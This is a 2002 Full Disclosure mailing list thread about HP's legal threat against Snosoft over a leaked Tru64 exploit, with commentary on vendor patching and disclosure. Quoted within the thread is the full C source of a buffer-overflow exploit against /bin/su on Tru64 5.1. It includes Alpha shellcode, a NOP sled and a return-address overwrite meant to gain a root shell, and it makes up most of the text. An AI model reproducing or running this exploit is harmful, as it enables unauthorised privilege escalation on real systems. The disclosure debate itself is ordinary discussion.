Full Disclosure mailing list archives
OT: Snosoft vs HP
From: full-disclosure () lists netsys com (Moyer, Shawn)
Date: Wed, 31 Jul 2002 12:23:01 -0500
I'm looking forward to seeing more of this novel "why patch when you can sue" approach. Anybody wanna buy a bunch of Alphas? Cheap?

Boo, hiss, and poo on HP for this juvenile and moronic approach to dealing with an exposure. As I read the press on this, the vuln has been known since at least spring, yet still no patch, and when the sploit leaks, these idiots unleash the lawyers. How lame.

Yes, it leaked through improper channels without a concurrent patch. So? I'm more disgusted with the fact that it's taken HP this long to fix the vuln. I guess they fired all the OSF/1 (sorry, Tru64, puke, puke, whatever) people.

I wonder if the Apache Group and Theo's bunch can pull this same swindle. They both got blindsided by improperly released vulns too, but rather than kvetch and whine and point fingers, they fixed 'em and moved on.

"Please save me, DMCA! I've been violated! Waaaaah!"

--shawn
-----Original Message-----
From: ATD [mailto:simon () snosoft com]
Sent: Wednesday, July 31, 2002 11:27
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] OT: Snosoft vs HP

What is even more interesting is that this issue has been known for quite a while, yet no one did anything about it.

Adriel

On Wed, 2002-07-31 at 12:22, Len Rose wrote:

> It's interesting to note that the exploit was removed from SecurityFocus' site. I wonder if HP is going to demand people remove it from all archives everywhere?
>
> Obligatory exploit:

/*
 * /bin/su tru64 5.1
 * works with non-exec stack enabled
 * stripey is the man
 * developed at http://www.snosoft.com in the cerebrum labs
 * phased
 * phased at mail.ru
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* bzero() */
#include <unistd.h>

char shellcode[]=
    "\x30\x15\xd9\x43"  /* subq $30,200,$16 */
    "\x11\x74\xf0\x47"  /* bis $31,0x83,$17 */
    "\x12\x14\x02\x42"  /* addq $16,16,$18 */
    "\xfc\xff\x32\xb2"  /* stl $17,-4($18) */
    "\x12\x94\x09\x42"  /* addq $16,76,$18 */
    "\xfc\xff\x32\xb2"  /* stl $17,-4($18) */
    "\xff\x47\x3f\x26"  /* ldah $17,0x47ff($31) */
    "\x1f\x04\x31\x22"  /* lda $17,0x041f($17) */
    "\xfc\xff\x30\xb2"  /* stl $17,-4($16) */
    "\xf7\xff\x1f\xd2"  /* bsr $16,-32 */
    "\x10\x04\xff\x47"  /* clr $16 */
    "\x11\x14\xe3\x43"  /* addq $31,24,$17 */
    "\x20\x35\x20\x42"  /* subq $17,1,$0 */
    "\xff\xff\xff\xff"  /* callsys ( disguised ) */
    "\x30\x15\xd9\x43"  /* subq $30,200,$16 */
    "\x31\x15\xd8\x43"  /* subq $30,192,$17 */
    "\x12\x04\xff\x47"  /* clr $18 */
    "\x40\xff\x1e\xb6"  /* stq $16,-192($30) */
    "\x48\xff\xfe\xb7"  /* stq $31,-184($30) */
    "\x98\xff\x7f\x26"  /* ldah $19,0xff98($31) */
    "\xd0\x8c\x73\x22"  /* lda $19,0x8cd0($19) */
    "\x13\x05\xf3\x47"  /* ornot $31,$19,$19 */
    "\x3c\xff\x7e\xb2"  /* stl $19,-196($30) */
    "\x69\x6e\x7f\x26"  /* ldah $19,0x6e69($31) */
    "\x2f\x62\x73\x22"  /* lda $19,0x622f($19) */
    "\x38\xff\x7e\xb2"  /* stl $19,-200($30) */
    "\x13\x94\xe7\x43"  /* addq $31,60,$19 */
    "\x20\x35\x60\x42"  /* subq $19,1,$0 */
    "\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* shellcode by Taeho Oh */

int main(int argc, char *argv[])
{
    int i, j;
    char buffer[8239];
    char payload[15200];
    char nop[] = "\x1f\x04\xff\x47";   /* Alpha NOP: bis $31,$31,$31 */

    bzero(&buffer, 8239);
    bzero(&payload, 15200);

    /* first argument: filler, then the address that overwrites the return address */
    for (i=0;i<8233;i++)
        buffer[i] = 0x41;

    /* 0x140010401 */
    buffer[i++] = 0x01;
    buffer[i++] = 0x04;
    buffer[i++] = 0x01;
    buffer[i++] = 0x40;
    buffer[i++] = 0x01;

    /* second argument: NOP sled followed by the shellcode */
    for (i=0;i<15000;) {
        for(j=0;j<4;j++) {
            payload[i++] = nop[j];
        }
    }

    for (i=i,j=0;j<sizeof(shellcode);i++,j++)
        payload[i] = shellcode[j];

    printf("/bin/su by phased\n");
    printf("payload %db\n", (int)strlen(payload));
    printf("buffer %db\n", (int)strlen(buffer));

    execl("/usr/bin/su", "su", buffer, payload, (char *)0);
    return 0;
}

_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure

--
-------------------------------------------------------
Secure Network Operations, Inc.  | http://www.snosoft.com
Cerebrum Project                 | cerebrum () snosoft com
Strategic Reconnaissance Team    | recon () snosoft com
-------------------------------------------------------